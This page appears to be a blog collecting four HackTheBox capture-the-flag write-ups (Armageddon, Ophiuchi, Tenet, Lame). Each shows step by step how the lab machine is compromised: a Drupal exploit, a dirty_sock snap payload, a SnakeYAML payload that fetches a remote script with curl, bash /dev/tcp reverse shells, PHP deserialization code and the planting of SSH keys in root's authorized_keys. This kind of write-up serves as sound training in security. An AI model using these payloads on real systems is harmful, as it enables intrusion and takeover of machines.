Armageddon – HackTheBox Machine | Writeup

July 24, 2021

Info

Armageddon is Linux-based easy machine, created by bertolis.

Enumeration

Let’s run network scan to check open ports and service versions.

SSH and HTTP port are open. We should be able to visit page on 10.10.10.233.

And yes, there is login page. Let’s explore this. On this page we can’t find anything interesting, but in source page and Wappalyzer…

Exploitation

It was easy to discover it. Drupal 7.x has multiple vulnerabilities, including PHP object injection and remote code execution vulnerabilities. Let’s google it.

This exploit name is actually very similar to Armageddon. Too easy if it’s correct one. Let’s git clone it and run it. It has very good explain how to use it, check it on GitHub here.

Before running, make sure you have installed highline gem .

sudo gem install highline

And then run exploit.

./drupalgeddon2.rb http://10.10.10.233/

And we got it. But there is not user.txt. It means we need more to explore.

User Escalation

Since we can’t use cd command, we need to manually explore it (ls /some/path or cat /some/path/file.txt).

Interesting directory is sites, where we maybe can find credentials.

And, we found it. Let’s connect to MySQL with these credentials. We can’t connect from our local machine, so, let’s login from shell we got. Since we can’t get actually MySQL shell, we will use Single MySQL Commands.

mysql -u [Username] -p[Password] -e "[Command to execute..]"

mysql -u drupaluser [email protected]*m23gBVj -e 'show databases'

And we can see drupal database, let’s check tables.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'show tables'

And, users is there! Let’s check it.

mysql -u drupaluser [email protected]*m23gBVj -D drupal -e 'SELECT * FROM users'

There is password hashes and usernames. First one, brucetherealadmin, has email added, [email protected] and that email is different from the other ones, so he might be main user. We will try to crack these hashes with john.

I already did this machine, so I’ll just show the password john cracked earlier. Command for cracking is in image. Now, when we have credentials, let’s login. brucetherealadmin:booboo

Got user! Now, let’s own root.

Root Escalation

First, we’ll check sudo capabilities.

We can run snap install without using password! Great, we can find exploit to escalate privileges with snap. Let’s google it.

We will check first one, named dirty_sock on GitHub. Clone it to your local machine.

I tried to transfer both scripts on target machine, but it not worked. We need to install it on target machine manually. I was looking at scripts and found this in dirty_sockv2.py:

So, we’ll copy this and print on target machine to .snap installation file, and we can install it on target system. We will use this command on target machine to make installation snap file:

python3 -c 'print("aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "==")' | base64 -d > installation.snap

And then,

sudo /usr/bin/snap install --devmode installation.snap

–devmode allows users to install snaps without enforcing security policies.

We will read README.md now to see how to use it.

Okay, so we need to become dirty_sock user. Let’s do this.

Yay! We are dirty_sock! If you get error that user doesn’t exist, just reset the machine. I had same problem. Now, we will try to become root. Just type sudo su.

Wooah, we got root! If it asks you for password, use dirty_sock as a password.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Ophiuchi – HackTheBox Machine | Writeup

July 3, 2021

Info

Ophiuchi is Linux-based medium machine, created by felamos.

Enumeration

First of all, I’ll run port scan so we can know which ports are open and service versions.

And we see 2 open ports. SSH and HTTP. Let’s visit page on 8080 port.

We found Online YAML Parser. Nothing interesting found in source page, so I’ll simply google YAML Exploit.

As always, I click on first results. So, this time we can see SnakeYaml Deserilization, and I will read that article.

Author of that article was already created the exploit payload with GitHub article. Read it. Now, we can use that payload on our Machine YAML Parser. First, start Python server to see if payload triggers the server.

Now, hit PARSE.

Wooah! It works! Payload triggered the server. I tried to get reverse shell this way, but it not worked. Let’s search for YAML Payload.

I found this one with same exploit we used. We maybe can abuse it with this YAML Payload and get reverse shell. Git clone this.

git clone https://github.com/artsploit/yaml-payload.git

Exploitation

After short researching, we can see AwesomeScriptEngineFactory.java file:

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

We can use this script to get reverse shell. How?

 Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
 Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");

I tried to get reverse shell direct from this exploit, but it not worked. We need to create reverse shell bash file and then call it.

bash -c 'bash -i >& /dev/tcp/10.10.14.90/4444 0>&1'

Now, let’s modify Runtime.getRuntime().exec in exploit.

Runtime.getRuntime().exec("curl 10.10.14.90:1234/rev.sh -o /tmp/rev.sh");
Runtime.getRuntime().exec("bash /tmp/rev.sh");

First execution is transfer reverse shell script to server, and second one is running that script on server. Now, to prepare our exploit for running, we need to compile it since it is written in Java. Using javac and jar we can compile it. Go to main dir (yaml-payload) of cloned file so we can compile entire directory.

javac src/artsploit/AwesomeScriptEngineFactory.java
jar cvf exploit.jar -C src/ .

Now, we will again start our python server, and NetCat listener on port 4444, then run same payload on our 8080 Page.

And we got shell as tomcat user. We don’t have permission to read user.txt. Let’s escalate to user.

User Escalation

After we got shell, it’s time for escalation. Let’s find how many users we have.

Only admin and there is user.txt. But we don’t have permission to read it. Since SSH port is open, I think we need to find creds for SSH login. We are tomcat, and creds might be in configuration directory. By default, these files are located at TOMCAT-HOME/conf. So, just type cd to get on default tomcat location.

Okay, so we can see there is conf directory. Enter into it, and explore.

I immediately noticed tomcat-users.xml and tomcat-users.xsd. I’ll read both of them.

And we found creds for user in tomcat-users.xml. Let’s try to SSH into it with these creds. Username: admin Password: whythereisalimit

We got user! It’s time for root!

Root Escalation

First let’s check sudo capabilities with sudo -l:

We can see index.go file, so let’s check what that file is doing.

First, it reads from main.wasm and then check if it’s not equal to 1, it’s not ready to deploy, else it’s ready. Since main.wasm is not readable, I’ll transfer it to my machine and try to analyze it. On your local machine, run:

rsync -e "ssh" [email protected]:/opt/wasm-functions/main.wasm /path/to/save

WASM is Web Assembly, you can read more about it here. To read main.wasm, we need to decode it. How? We will use wasm2wat. This tool converts Web Assembly binary into S-expressions. It is a command line tool that takes a binary file as input and generates an output file containing the readable text. More about Web Assembly advanced tools can be found here. I will use some random internet wasm2wat tool. Click here for it.

We need to change 0 to 1 (we saw that index.go script checks if it is equals to 1 or not). Now, copy that and now we need wat2wasm to convert it back to wasm. We will use that tool on same site, click here for it.

Download it, rename to main.wasm, start python server and then transfer to machine.

Now, we need to try to run it and see what happens.

sudo /usr/bin/go run /opt/wasm-functions/index.go

And it’s ready to deploy. We will abuse deploy.sh and put our public key and then we will be able to connect to root with SSH.

echo 'echo "ssh-rsa AAAAB==========your_public_key==========" > /root/.ssh/authorized_keys' >> deploy.sh

And then, run again index.go script.

And now, you should be able to connect to root with SSH.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Tenet – HackTheBox Machine | Writeup

June 12, 2021

Info

Tenet is Linux-based medium machine, created by egotisticalSW.

Enumeration

First of all, I’ll run port scan so we can know which ports are open and service versions.

Only two ports are open. They are 22 (SSH) and 80 (HTTP). Since it has opened port 80, we should be able to visit the page. Let’s type in our browser machine’s IP and go.

And we can see that is Apache2 Default page, nothing interesting can be found here. Let’s try to add tenet.htb (default domain name on HTB Machines are usually called machine.htb) in our local hosts. (/etc/hosts).

sudo nano /etc/hosts

Nano is one of the text editors. We’ll use it. So, with command above, you can open your list of local hosts. Now we can add machine ip and domain. Add this to /etc/hosts:

10.10.10.223    tenet.htb

Save it, and then type tenet.htb in our browser to see what we will get. And we getting WordPress page (you can see WordPress in footer). Now, let’s enum this site. Enumerating this, I have found “Recent Comments” and “neil” as author of the comment. It might be username. Let’s see what comment says:

I continued with enumerating the site more, but nothing else interesting found. Since Neil is talking about migration, it can be another host called sator. We’ll try to reach it. Open your /etc/hosts and do the same thing as before, but this time add sator.tenet.htb. After that, let’s go to the site. It’s again Apache2 Default Page. Let’s try to go to some random path (write anything after slash: www.test.com/123test123) and it should say to us on which server we are.

And we got it, we are on sator.tenet.htb. Let’s explore it by searching for some another paths. Neil mentioned backups, so I was trying to reach sator.tenet.htb/backups but nothing. Tried some other paths, but still nothing. Let’s try to reach sator.php now, maybe we can get something if it exists on the server.

It exists! But unfortunately, we are not able to read the source of that file. Neil mentioned that backups are not removed, and sator.php might be in that backups. Let’s try to download it adding .bak at the end of the name. “.bak” is a filename extension commonly used to signify a backup copy of a file – More About .BAK.

And yes, it worked. They really should delete these backups, haha.

Exploitation

Let’s read this file, open it with your text editor.

Here we see that the script looks for a GET input variable arepo and unserializes it. We might be able to exploit it using PHP Object Deserialization. Here you can read more about it: Exploiting PHP Deserialization. Here is a class called DatabaseExport with a __destruct function implemented. This function is what we can use to get RCE. The function uses file_put_contents to write the variable data to the file defined in the variable user_file. If we go over to the URI sator.tenet.htb/users.txt, we see that the file exists and prints SUCCESS. So, we need to create exploit that will spawn shell.

<?PHP
class DatabaseExport
{
        public $user_file = 'exploit.php';
        public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.XX.XX/1234 0>&1\'"); ?>';
        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
        }
}
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/exploit.php");
?>

Don’t forget to change your IP Address. When we got exploit, we need to start nc listener and to run exploit.

nc -nlvp 1234

And, run exploit in another tab.

php exploit.php

And we got connection! Now, let’s spawn python reverse shell.

And we got our shell! We are web user.

User Escalation

We saw that site is based on WordPress, so let’s find wp-config.php where credentials should be. We are in /var/www/html directory, and when we list files, we can see wordpress folder.

We found credentials. SSH Port is open, so we can connect to it via SSH.

And we got user via SSH. Now, grab the user flag, and paste it to HTB.

Root Escalation

We check what sudo capabilities our user has got using:

sudo -l

We can see that we can run /usr/local/bin/enableSSH.sh, let’s read it.

cat /usr/local/bin/enableSSH.sh

And we got:

#!/bin/bash

checkAdded() {

	sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)

	if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then

		/bin/echo "Successfully added $sshName to authorized_keys file!"

	else

		/bin/echo "Error in adding $sshName to authorized_keys file!"

	fi

}

checkFile() {

	if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then

		/bin/echo "Error in creating key file!"

		if [[ -f $1 ]]; then /bin/rm $1; fi

		exit 1

	fi

}

addKey() {

	tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

	(umask 110; touch $tmpName)

	/bin/echo $key >>$tmpName

	checkFile $tmpName

	/bin/cat $tmpName >>/root/.ssh/authorized_keys

	/bin/rm $tmpName

}

key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl [email protected]"
addKey
checkAdded

With this script, we can add our public SSH key to Root’s authorized keys. To copy your SSH public key, you need to create new or copy already existing keys. We will create new ones, on your local machine type:

ssh-keygen

Just pres ENTER, don’t add password, etc.. If it asks you to overwrite, press y and ENTER. Default location of SSH keys is /home/username/.ssh, so let’s cd into it and copy our public key. (id_rsa.pub).

Now, copy it and go to the box. We will create a simple script which will write our public key to /root/.ssh/authorized_keys and then we will be able to SSH into it. In box, open text editor (in my case, it’s nano), and make script with your public key that you have copied.

while true;
do echo "ssh-rsa YOURKEY" | tee /tmp/ssh* > /dev/null;
done

Now, add executable permissions to exploit.sh:

chmod +x exploit.sh

Now, connect again to neil via SSH but in new tab, so we can run exploit.sh and enableSSH.sh. When you’re connected, then run exploit exploit.sh:

bash exploit.sh

Now, in another tab, run enableSSH.sh multiple times, with sudo:

sudo /usr/local/bin/enableSSH.sh

Run that command (with enableSSH.sh) multiple times so you can connect via SSH. In my case, I run it more than 50 times and then I have successfully connected to root. When you have run it enough times, try to connect to root:

ssh -i id_rsa [email protected]

This time, we are using private key to connect (id_rsa). If you tried too many times to connect but failed, try resetting the box.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Lame – HackTheBox Machine | Writeup

June 7, 2021

Info

Lame is first box ever created on HackTheBox. It’s Linux-based easy machine created by ch4p.

Enumeration

Since this machine is retired, and only VIP members can access it, I have different machine IP. You can find Machine IP in that machine’s page. For this machine, you need basic Linux knowledge. As always, I first start with network scanning to see which ports are open, service versions etc..

nmap -sC -sV 10.10.10.3

Exploitation

In scan result, we can see FTP details, and anonymous login is allowed. Also, there is also mentioned FTP Version “vsFTPd 2.3.4”. Googling it, I have found – VSFTPD v2.3.4 Backdoor Command Execution, tried to run it but nothing. It might be a rabbit hole. After attempting to enter using the vsFTPd attack vector, Samba becomes the only target. Googling it for exploit, I clicked on first result – Samba “username map script” Command Execution – Rapid7, and it’s exploitable with Metasploit. Also, the exploit version matches with our. So, I’ll run Metasploit console and try this one.

msfconsole

And now, I’ll use search command to find that exploit.

Found it! Let’s use it as exploit:

use exploit/multi/samba/usermap_script

Now, when we have loaded our exploit, let’s take a look on exploit options with command:

show options

Okay, we have options! Now, let’s set it properly. We have RHOSTS, and there we need to set Machine IP. RPORT we shouldn’t change, it’s set by default on 139. LHOST is our Local Machine IP, actually our VPN Connection IP. You can check it by typing:

ifconfig

Your Local Machine IP (on HackTheBox) should start with 10.10.XX.XX. Now, we can set our LHOST in Metasploit Console to the Local Machine IP:

set LHOST 10.10.XX.XX

Now, let’s set RHOST (Machine IP):

set RHOST 10.129.159.5

And now, let’s try to run it and see what will happen. Use command:

run

Wait few seconds, and…

And we got it! Now, we can grab our flags and submit it. On HTB Linux Machines, user flag is always in User Directory. (/home/username/user.txt) and root flag is always in Root Directory (/root/root.txt). To get user, get into the /home directory and you can see 4 users there. I have checked all of them, and only user makis have user.txt file. To get root, simply read the file under /root/root.txt.

PWNED!

Thank you for reading this writeup. If you want to support my work:

Category: HackTheBox Machines

Info

Enumeration

Exploitation

User Escalation

Root Escalation

PWNED!

Info

Enumeration

Exploitation

User Escalation

Root Escalation

PWNED!

Info

Enumeration

Exploitation

User Escalation

Root Escalation

PWNED!

Info

Enumeration

Exploitation

PWNED!